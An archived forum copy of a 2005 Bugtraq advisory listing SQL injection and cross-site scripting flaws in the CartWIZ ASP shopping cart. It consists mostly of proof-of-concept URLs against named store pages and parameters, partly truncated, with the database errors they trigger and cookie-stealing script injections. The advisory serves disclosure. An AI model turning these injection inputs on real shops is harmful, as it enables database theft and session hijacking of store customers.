Sql Injection And Xss In Cartwiz Asp Cart

Full Version: Sql Injection And Xss In Cartwiz Asp Cart

GovernmentSecurity.org > General GSO > Exploit & Vulnerability Mailing List Archives

qcred11

Apr 24 2005, 12:02 PM

QUOTE

Severity: High
Title: Multiple Sql injection and XSS in CartWIZ ASP Cart
Date: 23/04/2005
Vendor: CartWIZ
Vendor Website: http://www.cartwiz.com

Proof of Concept Exploits:

http://localhost/cartWiz/store/addToCart.a...TION&quantity=1
SQL INJECTION

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string 'SQL_INJECTION'.
/cartWiz/store/addToCart.asp, line 86

http://localhost/cartwiz/store/productDeta...SQL%20INJECTION
SQL INJECTION
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string 'SQL INJECTION'.

/cartwiz/store/productDetails.asp, line 34

http://localhost/cartwiz/store/searchResul...riceTo='SQL INJECTION&validate=1
SQL INJECTION

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Line 1: Incorrect syntax near 'SQL'.

/cartwiz/store/searchResults.asp, line 102

http://localhost/cartwiz/store/searchResul...ceFrom='SQL INJECTION&priceTo=9999999999&validate=1
SQL INJECTION

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Line 1: Incorrect syntax near 'SQL'.

/cartwiz/store/searchResults.asp, line 102

http://localhost/cartwiz/store/searchResul...tegory='SQL INJECTION&sku=&priceFrom=0&priceTo=9999999999&validate=1
SQL INJECTION

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Line 1: Incorrect syntax near ' or products.briefDescription LIKE '.

/cartwiz/store/searchResults.asp, line 102

http://localhost/cartwiz/store/tellAFriend...</script>
XSS Pops Cookie

http://localhost/cartwiz/store/addToWishli...</script>
XSS Pops Cookie

http://localhost/cartwiz/store/access.asp?...</script>
XSS Pops Cookie

http://localhost/cartWiz/store/error.asp?m...</script>
XSS Pops Cookie

http://localhost/cartwiz/store/login.asp?m...</script>
XSS Pops Cookie

http://localhost/cartwiz/store/login.asp?m...t>&redirect=
XSS Pops Cookie

http://localhost/cartwiz/store/searchResul...9999&validate=1
XSS Pops Cookie

http://localhost/cartwiz/store/searchResul...9999&validate=1
XSS Pops Cookie

http://localhost/cartwiz/store/productCata...tegory='SQL ERROR
SQL ERROR

Microsoft VBScript runtime error '800a000d'
Type mismatch: '[string: "'SQL ERROR"]'

/cartwiz/store/productCatalogSubCats.asp, line 87

Author:
These vulnerabilties have been found and released by Diabolic Crab

Source: http://seclists.org/lists/bugtraq/2005/Apr/0385.html

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.